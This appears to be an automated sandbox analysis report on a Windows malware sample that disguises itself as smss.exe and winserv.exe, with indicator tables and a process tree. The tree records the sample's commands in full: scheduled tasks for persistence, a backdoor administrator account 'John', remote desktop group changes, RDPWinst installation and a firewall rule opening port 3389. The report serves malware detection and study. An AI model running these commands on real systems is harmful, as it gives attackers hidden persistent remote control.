winserv.exe 732 winserv.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4200 wrote to memory of 5088 4200 msedge.exe 91 PID 4200 wrote to memory of 5088 4200 msedge.exe 91 PID 4528 wrote to memory of 1832 4528 smss.exe 92 PID 4528 wrote to memory of 1832 4528 smss.exe 92 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 3008 4200 msedge.exe 94 PID 4200 wrote to memory of 4176 4200 msedge.exe 95 PID 4200 wrote to memory of 4176 4200 msedge.exe 95 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 PID 4200 wrote to memory of 4864 4200 msedge.exe 96 -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Users\Admin\AppData\Local\Temp\smss.exe"C:\Users\Admin\AppData\Local\Temp\smss.exe"1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Program Files directory
- Checks processor information in registry
- Modifies registry class
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4528 -
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winsers" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC MINUTE /MO 1 /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:1832
-
-
C:\Windows\System32\schtasks.exe"C:\Windows\System32\schtasks.exe" /create /TN "Microsoft\Windows\Wininet\winser" /TR "\"C:\ProgramData\Windows Tasks Service\winserv.exe\" Task Service\winserv.exe" /SC ONLOGON /RL HIGHEST2⤵
- Creates scheduled task(s)
PID:2384
-
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:3640 -
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" -second3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4776
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net user John 12345 /add2⤵PID:5132
-
C:\Windows\system32\net.exenet user John 12345 /add3⤵PID:5192
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user John 12345 /add4⤵PID:5208
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Администраторы" John /add2⤵PID:5228
-
C:\Windows\system32\net.exenet localgroup "Администраторы" John /add3⤵PID:5304
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Администраторы" John /add4⤵PID:5328
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного рабочего стола" John /add2⤵PID:5356
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного рабочего стола" John /add3⤵PID:5440
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного рабочего стола" John /add4⤵PID:5460
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Пользователи удаленного управления" john /add" John /add2⤵PID:5480
-
C:\Windows\system32\net.exenet localgroup "Пользователи удаленного управления" john /add" John /add3⤵PID:5544
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Пользователи удаленного управления" john /add" John /add4⤵PID:5560
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administrators" John /add2⤵PID:5588
-
C:\Windows\system32\net.exenet localgroup "Administrators" John /add3⤵PID:5668
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administrators" John /add4⤵PID:5688
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Administradores" John /add2⤵PID:5704
-
C:\Windows\system32\net.exenet localgroup "Administradores" John /add3⤵PID:5756
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Administradores" John /add4⤵PID:5772
-
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c net localgroup "Remote Desktop Users" john /add2⤵PID:5788
-
C:\Windows\system32\net.exenet localgroup "Remote Desktop Users" john /add3⤵PID:5840
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup "Remote Desktop Users" john /add4⤵PID:5856
-
-
-
-
C:\ProgramData\RDPWinst.exeC:\ProgramData\RDPWinst.exe -i2⤵
- Sets DLL path for service in the registry
- Executes dropped EXE
- Modifies WinLogon
- Drops file in System32 directory
- Drops file in Program Files directory
- Suspicious use of AdjustPrivilegeToken
PID:5192 -
C:\Windows\SYSTEM32\netsh.exenetsh advfirewall firewall add rule name="Remote Desktop" dir=in protocol=tcp localport=3389 profile=any action=allow3⤵
- Modifies Windows Firewall
PID:5564
-
-
-
C:\Windows\system32\cmd.exeC:\Windows\system32\cmd.exe /c C:\Programdata\Install\del.bat2⤵PID:5140
-
C:\Windows\system32\timeout.exetimeout 53⤵
- Delays execution with timeout.exe
PID:2644
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- NTFS ADS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:4200 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff81d7c46f8,0x7ff81d7c4708,0x7ff81d7c47182⤵PID:5088
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2060 /prefetch:22⤵PID:3008
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2208 /prefetch:32⤵
- Suspicious behavior: EnumeratesProcesses
PID:4176
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2904 /prefetch:82⤵PID:4864
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3384 /prefetch:12⤵PID:1532
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3392 /prefetch:12⤵PID:2312
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4196 /prefetch:12⤵PID:3524
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5180 /prefetch:12⤵PID:3416
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵PID:5348
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5412 /prefetch:82⤵
- Suspicious behavior: EnumeratesProcesses
PID:5880
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:6080
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5468 /prefetch:12⤵PID:5520
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5232 /prefetch:12⤵PID:5780
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5660 /prefetch:12⤵PID:5748
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=audio --mojo-platform-channel-handle=3548 /prefetch:82⤵PID:6064
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=video_capture --mojo-platform-channel-handle=5468 /prefetch:82⤵
- Modifies registry class
- Suspicious behavior: EnumeratesProcesses
PID:3032
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5892 /prefetch:12⤵PID:5400
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵PID:5760
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5764 /prefetch:12⤵PID:5620
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5840 /prefetch:12⤵PID:2972
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5088 /prefetch:12⤵PID:4656
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=collections --mojo-platform-channel-handle=5592 /prefetch:82⤵PID:1188
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6020 /prefetch:12⤵PID:5608
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6528 /prefetch:82⤵PID:1792
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6412 /prefetch:82⤵PID:5372
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=26 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1712 /prefetch:12⤵PID:4824
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2260 /prefetch:12⤵PID:5460
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=28 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6488 /prefetch:12⤵PID:4256
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=29 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5940 /prefetch:12⤵PID:5784
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=30 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5460 /prefetch:12⤵PID:5552
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=31 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5708 /prefetch:12⤵PID:5476
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=33 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5716 /prefetch:12⤵PID:5288
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=icon_reader --mojo-platform-channel-handle=6660 /prefetch:82⤵PID:4564
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6244 /prefetch:82⤵PID:1844
-
-
C:\Users\Admin\Downloads\AutoIt-Extractor-net40-x64.exe"C:\Users\Admin\Downloads\AutoIt-Extractor-net40-x64.exe"2⤵
- Checks computer location settings
- Executes dropped EXE
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:3164 -
C:\Users\Admin\AppData\Local\Temp\aut62312.exe"C:\Users\Admin\AppData\Local\Temp\aut62312.exe"3⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:2008
-
-
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1968,2393812051090399907,9986652501540708217,131072 --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --gpu-preferences=UAAAAAAAAADoAAAQAAAAAAAAAAAAAAAAAABgAAAEAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=6816 /prefetch:22⤵PID:5556
-
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:2592
-
C:\Windows\System32\CompPkgSrv.exeC:\Windows\System32\CompPkgSrv.exe -Embedding1⤵PID:3040
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵PID:5328
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k NetworkService -s TermService1⤵
- Loads dropped DLL
- Drops file in Program Files directory
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:808
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5648
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5540
-
C:\Windows\System32\rundll32.exeC:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding1⤵PID:3552
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:4620
-
C:\Windows\system32\NOTEPAD.EXE"C:\Windows\system32\NOTEPAD.EXE" C:\Users\Admin\Documents\test.txt1⤵
- Opens file in notepad (likely ransom note)
PID:5336
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:6136
-
C:\ProgramData\Windows Tasks Service\winserv.exe"C:\ProgramData\Windows Tasks Service\winserv.exe" Task Service\winserv.exe1⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
PID:5196
-
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --profile-directory=Default1⤵
- Enumerates system info in registry
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:3872 -
C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ff81d7c46f8,0x7ff81d7c4708,0x7ff81d7c47182⤵PID:6092
-
-
